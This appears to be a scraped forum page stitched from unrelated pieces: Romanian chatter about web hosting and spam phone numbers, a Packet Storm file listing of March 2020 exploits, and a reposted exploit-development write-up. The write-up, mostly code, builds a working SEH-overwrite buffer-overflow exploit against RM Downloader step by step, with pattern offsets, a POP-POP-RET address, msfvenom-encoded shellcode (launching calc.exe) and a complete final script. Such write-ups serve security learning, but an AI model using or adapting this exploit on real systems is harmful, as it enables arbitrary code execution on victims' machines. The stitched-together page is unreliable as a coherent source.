Leaderboard

are servicii de top kostik, exact acasa cum se recomanda. raportul pret/calitate cred ca e imbatabil pe piata. nu te pune nimeni pana la urma sa hostezi la kostik, dar sincer, iti recomand, s-ar putea sa fii arhimultumit.

TrueCaller - toate nr postate de tine de Romania sunt deja listate ca SPAM.

Ai nr de telefon pus public?

Packet Storm released new exploits on April 1st: 202003-exploits.tgz 2020-04-01 18:27 Folder Folder 2003-exploits 2020-03-09 18:51 1840 ? 2003-exploits\60cyclecms252-sql.txt 2020-03-06 17:02 1758 ? 2003-exploits\deepinstinctwa12290-unquotedpath.txt 2020-03-06 14:12 1648 ? 2003-exploits\iskysoftfs243-unquotedpath.txt 2020-03-06 15:33 1778 ? 2003-exploits\spyhunter4-unquotedpath.txt 2020-03-09 19:09 5040 ? 2003-exploits\SYSS-2020-006.txt 2020-03-16 15:50 932 ? 2003-exploits\exploit_sumavision.sh.txt 2020-03-13 16:50 5291 ? 2003-exploits\anyburn48-overflow.txt 2020-03-26 17:17 5761 ? 2003-exploits\wpwpforms1582-xss.txt 2020-03-03 16:02 3528 ? 2003-exploits\ricohaficio-inject.txt 2020-03-23 18:09 1516 ? 2003-exploits\joomlahwdplayer42-sql.txt 2020-03-10 15:02 20739 ? 2003-exploits\sysaid20111-exec.tgz 2020-03-19 17:14 9725 ? 2003-exploits\broadcomwifi-disclose.txt 2020-03-12 22:10 5485 ? 2003-exploits\exploit-inc-inclusion.py.txt 2020-03-25 16:42 2383 ? 2003-exploits\hpthinpro-exec.txt 2020-03-16 15:52 1155 ? 2003-exploits\miladwsvip10-sql.txt 2020-03-05 22:57 15366 ? 2003-exploits\netkittelnet017-exec.txt 2020-03-14 00:22 3995 ? 2003-exploits\REVIVE-SA-2020-002.txt 2020-03-12 21:35 7207 ? 2003-exploits\wingftpserver623-xsrf.txt 2020-03-04 15:50 1833 ? 2003-exploits\xoodigital210-sql.txt 2020-03-16 16:00 12662 ? 2003-exploits\GS20200316140021.tgz 2020-03-02 17:30 3775 ? 2003-exploits\cyberoamac2127-overflow.txt 2020-03-11 20:22 3972 ? 2003-exploits\rconfig39-sql.txt 2020-03-25 16:16 1657 ? 2003-exploits\avastsecureline555220-unquotedpath.txt 2020-03-13 16:51 1056 ? 2003-exploits\centoswebpanel7-sql.txt 2020-03-31 18:55 1608 ? 2003-exploits\kandnconceptsclubcms1x-sqlxss.txt 2020-03-23 18:12 1852 ? 2003-exploits\ZSL-2020-5563.txt 2020-03-25 16:12 738 ? 2003-exploits\joomlagmapfp330-upload.txt 2020-03-04 15:48 566 ? 2003-exploits\unisharplfm200-fileread.txt 2020-03-18 16:58 5733 ? 2003-exploits\vmwarefusion-escalate.txt 2020-03-18 16:51 3350 ? 2003-exploits\microtikssh6443-dos.txt 2020-03-09 12:11 13859 ? 2003-exploits\GS20200309171607.tgz 2020-03-30 14:11 4691 ? 2003-exploits\wper543-upload.txt 2020-03-02 17:31 2298 ? 2003-exploits\netiswf2419-exec.txt 2020-03-31 17:32 993 ? 2003-exploits\flashfxp420-dos.txt 2020-03-28 16:40 4436 ? 2003-exploits\dlink_dwl_2600_command_injection.rb.txt 2020-03-24 17:06 3841 ? 2003-exploits\ucm6202101813-exec.txt 2020-03-10 15:17 10955 ? 2003-exploits\nagios_xi_authenticated_rce.rb.txt 2020-03-31 17:31 3301 ? 2003-exploits\grandstreamucm6200cti-sql.txt 2020-03-10 15:03 1400 ? 2003-exploits\yzmcms55-xss.txt 2020-03-20 16:58 1311 ? 2003-exploits\vmwarefusion1152-escalate.txt 2020-03-28 16:36 4058 ? 2003-exploits\codebeamer95-xss.txt 2020-03-27 15:07 695 ? 2003-exploits\everest5502100-dos.txt 2020-03-24 20:32 2368 ? 2003-exploits\sialwebcms-sqlxss.txt 2020-03-04 15:58 7328 ? 2003-exploits\exchange_ecp_viewstate.rb.txt 2020-03-26 17:16 5421 ? 2003-exploits\sharepoint_workflows_xoml.rb.txt 2020-03-26 16:43 2728 ? 2003-exploits\centreo19108-exec.txt 2020-03-28 16:30 4641 ? 2003-exploits\rconfig394sf-exec.txt 2020-03-05 23:01 9303 ? 2003-exploits\chrome_array_map.rb.txt 2020-03-16 15:57 1773 ? 2003-exploits\phpkbml9iu-exec.txt 2020-03-27 15:11 1005 ? 2003-exploits\eckhotel10-xsrf.txt 2020-03-27 14:55 2892 ? 2003-exploits\jinfornetjreport156-traversal.txt 2020-03-23 18:02 2929 ? 2003-exploits\cyberarkpsmp1091-bypass.txt 2020-03-24 12:11 1492 ? 2003-exploits\veyon434-unquotedpath.txt 2020-03-20 16:45 653 ? 2003-exploits\exagatesysguard6001-xsrf.txt 2020-03-23 18:06 4850 ? 2003-exploits\enovanetctflwsec70-sql.xss.txt 2020-03-30 13:02 832 ? 2003-exploits\odinsecureftpe763-dos.txt 2020-03-15 15:33 122064 ? 2003-exploits\CVE-2020-0796-PoC-master.tgz 2020-03-30 13:11 812 ? 2003-exploits\dmecms10-sqlxss.txt 2020-03-08 21:32 2097 ? 2003-exploits\AIT-SA-20200301-01.txt 2020-03-02 17:33 775 ? 2003-exploits\intelbraswrn240-bypass.txt 2020-03-23 18:08 1529 ? 2003-exploits\rconfig394-exec.txt 2020-03-10 15:04 959 ? 2003-exploits\persianvipds10-sql.txt 2020-03-31 17:34 2182 ? 2003-exploits\draytek-exec.txt 2020-03-09 19:11 2910 ? 2003-exploits\CVE-2020-8597-master.zip 2020-03-17 12:11 792 ? 2003-exploits\uadminbotnet-sql.txt 2020-03-23 17:56 3119 ? 2003-exploits\googlechrome80-dos.txt 2020-03-12 22:02 783 ? 2003-exploits\atmailwebmail-openredirect.txt 2020-03-27 12:11 1277 ? 2003-exploits\sgec1-sql.txt 2020-03-22 16:22 647 ? 2003-exploits\proficyscada5025920-dos.txt 2020-03-18 11:02 4830 ? 2003-exploits\CVE-2020-8597.py.txt 2020-03-15 15:39 3616 ? 2003-exploits\mswinsmb3-exec.txt 2020-03-11 15:52 1728 ? 2003-exploits\asusaxsp10200-unquotedpath.txt 2020-03-03 16:03 4161 ? 2003-exploits\alfresco524-xss.txt 2020-03-18 16:54 495 ? 2003-exploits\iwm-bypass.txt 2020-03-03 16:05 3165 ? 2003-exploits\ricohaficio5210sf-inject.txt 2020-03-05 23:03 15359 ? 2003-exploits\php_fpm_rce.rb.txt 2020-03-30 19:17 25127 ? 2003-exploits\ibm_tm1_unauth_rce.rb.txt 2020-03-18 17:12 2564902 ? 2003-exploits\VSCode_PoC_Oct2019-master.tgz 2020-03-25 16:35 1964 ? 2003-exploits\leptoncms450-xss.txt 2020-03-23 18:17 3962 ? 2003-exploits\horde_csv_rce.rb.txt 2020-03-05 22:59 8953 ? 2003-exploits\chrome_object_create.rb.txt 2020-03-10 14:59 3980782 ? 2003-exploits\csgo.tgz 2020-03-24 16:16 2157 ? 2003-exploits\ulicms20201-xss.txt 2020-03-25 16:18 6782 ? 2003-exploits\androidbluetooth-dos.txt 2020-03-29 15:55 9110 ? 2003-exploits\redis_replication_cmd_exec.rb.txt 2020-03-02 17:36 14381 ? 2003-exploits\wingftpserver623-escalate.txt 2020-03-11 20:22 1532 ? 2003-exploits\rconfig393ajax-exec.txt 2020-03-12 22:05 5334 ? 2003-exploits\rt-sa-2020-001.txt 2020-03-30 18:37 3460 ? 2003-exploits\zenlb3101-exec.txt 2020-03-11 15:54 858 ? 2003-exploits\wpsearchmeter2132-csvinject.txt 2020-03-26 17:11 15635 ? 2003-exploits\linux160406ptrace-localroot.txt 2020-03-05 16:48 5156 ? 2003-exploits\opensmtpd_oob_read_lpe.rb.txt 2020-03-05 16:45 12003 ? 2003-exploits\chrome_jscreate_sideeffect.rb.txt 2020-03-02 17:25 2032 ? 2003-exploits\tplinktlwr849n-exec.txt 2020-03-16 16:05 7964 ? 2003-exploits\rconfig_ajaxarchivefiles_rce.rb.txt 2020-03-18 17:15 2048 ? 2003-exploits\razersynapse100-dllinject.txt 2020-03-31 17:38 62906 ? 2003-exploits\CVE-2020-0796.tgz 2020-03-02 17:38 10260 ? 2003-exploits\msexchange2019-exec.txt 2020-03-28 16:48 5609 ? 2003-exploits\SYSS-2019-046.txt 2020-03-02 17:26 3261 ? 2003-exploits\wptutorlms153-xsrf.txt 2020-03-02 17:24 4457 ? 2003-exploits\wingftp625-escalate.txt 2020-03-02 21:18 4665 ? 2003-exploits\GS20200302191719.txt 2020-03-30 18:55 7294 ? 2003-exploits\10-strike-network-inventory-explorer_x86_poc_win8.py.txt 2020-03-06 15:02 2345 ? 2003-exploits\mswindowswizard-escalate.txt 2020-03-28 16:50 8733 ? 2003-exploits\SYSS-2019-047.txt 2020-03-14 19:25 6134 ? 2003-exploits\desktopcentral_deserialization.rb.txt 2020-03-28 16:44 44338 ? 2003-exploits\ibmcognostm1pas-overwriteexec.txt 2020-03-25 16:25 1559 ? 2003-exploits\10strikenie-unquotedpath.txt 2020-03-05 23:05 4571 ? 2003-exploits\apache_activemq_traversal_upload.rb.txt 2020-03-09 19:04 4739 ? 2003-exploits\SYSS-2020-004.txt 2020-03-26 16:55 1222 ? 2003-exploits\tplinkarcherc50-dos.py.txt 2020-03-30 18:38 3847 ? 2003-exploits\zenload3r.py.txt 2020-03-03 16:11 10046 ? 2003-exploits\eyesofnetwork_autodiscovery_rce.rb.txt 2020-03-18 17:17 3893 ? 2003-exploits\zonealarmtvims-insecure.txt 2020-03-16 15:54 9609 ? 2003-exploits\phpkbml9-exec.txt 2020-03-25 16:38 2338 ? 2003-exploits\hpthinprocitrix-exec.txt 2020-03-27 14:54 3714 ? 2003-exploits\easyrmtomp3273700-overflow.txt 2020-03-02 17:22 3193 ? 2003-exploits\joplindesktop10184-xss.txt 2020-03-25 16:31 3522 ? 2003-exploits\10strikenie854add-overflow.txt 2020-03-09 19:07 5103 ? 2003-exploits\SYSS-2020-005.txt 2020-03-13 16:52 11897 ? 2003-exploits\drobo5n2411-exec.txt 2020-03-31 17:29 4188 ? 2003-exploits\grandstreamucm6200-sql.txt 2020-03-06 15:55 25191 ? 2003-exploits\medc-exec.txt 2020-03-12 22:25 4511 ? 2003-exploits\ssrs_navcorrector_viewstate.rb.txt 2020-03-07 15:33 785 ? 2003-exploits\irisgraphic-sql.txt 2020-03-25 16:28 2751 ? 2003-exploits\hpthinpro-escalate.txt 2020-03-28 16:25 4625 ? 2003-exploits\freecommander_2020_build810a_x86_poc_win8.py.txt 2020-03-12 22:07 7435 ? 2003-exploits\exploit-phar-loading.py.txt 2020-03-12 21:45 1744 ? 2003-exploits\asusaahm1022-unquotedpath.txt 2020-03-12 21:47 2676 ? 2003-exploits\hrsale118-xsrf.txt 2020-03-12 22:23 6467 ? 2003-exploits\GS20200312202308.tgz 2020-03-25 16:23 2808 ? 2003-exploits\hpthinpro-disclose.txt 2020-03-14 19:16 14543 ? 2003-exploits\SA-20200312-0.txt 2020-03-06 21:02 1570 ? 2003-exploits\sentrifugohrms32id-sql.txt 2020-03-15 15:41 49522 ? 2003-exploits\zyxelsecumanager-exec.txt 2020-03-02 21:19 7893 ? 2003-exploits\GS20200302191946.tgz 2020-03-18 16:42 1533 ? 2003-exploits\netlinkgponrouter1011-exec.txt 2020-03-02 17:42 2347 ? 2003-exploits\cacti128-exec.rb.txt 2020-03-16 15:56 1448 ? 2003-exploits\phpkbml9-traversal.txt 2020-03-27 12:34 6483 ? 2003-exploits\wpstattraq130-sql.txt 2020-03-18 17:30 10340 ? 2003-exploits\centreon_pollers_auth_rce.rb.txt 2020-03-28 06:44 1639 ? 2003-exploits\webexcelsecom-sqlxss.txt 2020-03-03 16:06 5598 ? 2003-exploits\gunetopeneclass173-sql.txt 2020-03-12 21:57 1492 ? 2003-exploits\wpbookingcalendar1334-csvinject.txt 2020-03-25 16:26 3088 ? 2003-exploits\hpthinprofilter-bypass.txt 2020-03-10 15:16 2046 ? 2003-exploits\phpstudy_backdoor_rce.rb.txt 2020-03-19 17:22 4760 ? 2003-exploits\efsws72smtp-overflow.txt 2020-03-02 17:29 654 ? 2003-exploits\tplinktlwr849n-bypass.txt 2020-03-18 03:11 1941 ? 2003-exploits\netbackup70-unquotedpath.txt 2020-03-30 18:44 4334 ? 2003-exploits\joomlafabrik3911-traversal.txt 2020-03-06 16:02 1622 ? 2003-exploits\asusgiftbox111127-unquotedpath.txt 2020-03-09 19:13 19874460 ? 2003-exploits\Richsploit-master.zip # # Total Size Packed Files # 27371193 0 153 Download: 202003-exploits.tgz MD5 | 4a24dc33e2ed6b2bddc049bef69a01b5 Source: https://packetstormsecurity.com/files/157052/Packet-Storm-New-Exploits-For-March-2020.html

Preamble The other day, i was gathering through Exploit-DB as usual, when i came across with this exploit, interested, i was eager to know if i could find a vulnerability. As a result of my success, i will explain the finding. The Bug RM Downloader suffers from a Buffer Overflow and a Structured Exception Handling Overwrite when inputting long strings within the ‘Load’ parameter. A small fuzzing script is generated: import struct buffer = "A" * 10000 f = open ("poc.txt", "w") f.write(buffer) f.close() Once the script is executed, the file is created: In order to crash the application with the generated bytes, open the ‘Load’ tab, and paste the contents within the ‘Load’ parameter: Once this is done, click OK. Two additional messageboxes may appear, just click OK. After this is done the application successfully crashes: Voila! The EIP has been successfully written. Moreover, the SEH Chains has suffered from an overwrite as well: This application could easily be exploited with the use of a JMP/CALL ESP or PUSH ESP, RET. However, as like SEH Overwrites more, i will perform one on this case. A pattern is generated and saved into a file named “pattern”: root@whitecr0wz:~/Exploit-Dev# msf-pattern_create -l 10000 > pattern root@whitecr0wz:~/Exploit-Dev# The contents of the file “pattern” are copied and pasted within the ‘Load’ parameter, repeting the process: After the SEH Chain values have been overwritten, the nSEH value is copied: The offset is calculated with msf-pattern_offset: root@whitecr0wz:~/Exploit-Dev# msf-pattern_offset -q 336F4C32 -l 10000 [*] Exact match at offset 9008 root@whitecr0wz:~/Exploit-Dev# The PoC is updated: import struct buffer = "A" * 9008 + "BBBB" + "CCCC" f = open ("poc.txt", "w") f.write(buffer) f.close() If the script works as intended, the nSEH value should be 42424242 (BBBB) and the SEH value 43434343 (CCCC): Good, in an escenario like this, a 3-byte SEH Overwrite could be performed, in case there are no available addresses without a NULL-byte. The modules are listed: As seen, the module RDfilter03 does not have any kind of protections/mitigations. Moreover, the base address does not contain a NULL- byte. Listing the POP-POP-RETN sequences: The first address (0x10031779) was chosen. The PoC is updated: import struct nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10031779) buffer = "A" * 9008 + nseh + seh + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close() After repeating the process, the SEH Chain values are overwritten as expected: After pressing SHIFT+F9 (Run), the additional bytes are executed: Shellcode is generated: root@whitecr0wz:~/Exploit-Dev# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/alpha_mixed x86/alpha_mixed succeeded with size 448 (iteration=0) x86/alpha_mixed chosen with final size 448 Payload size: 448 bytes Final size of py file: 2188 bytes buf = b"" buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b" buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75" buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c" buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b" buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70" buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72" buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59" buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32" buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56" buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71" buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31" buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64" buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39" buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70" buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73" buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78" buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52" buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b" buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45" buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a" buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c" buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71" buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50" buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f" buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43" buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45" buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d" buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42" buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63" buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68" buf += b"\x53\x55\x35\x50\x41\x41" EndGame Final Code: import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 448 bytes buf = b"" buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b" buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75" buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c" buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b" buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70" buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72" buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59" buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32" buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56" buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71" buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31" buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64" buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39" buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70" buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73" buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78" buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52" buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b" buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45" buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a" buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c" buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71" buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50" buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f" buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43" buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45" buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d" buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42" buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63" buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68" buf += b"\x53\x55\x35\x50\x41\x41" nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10031779) buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close() Source: hwhitecr0wz.github.io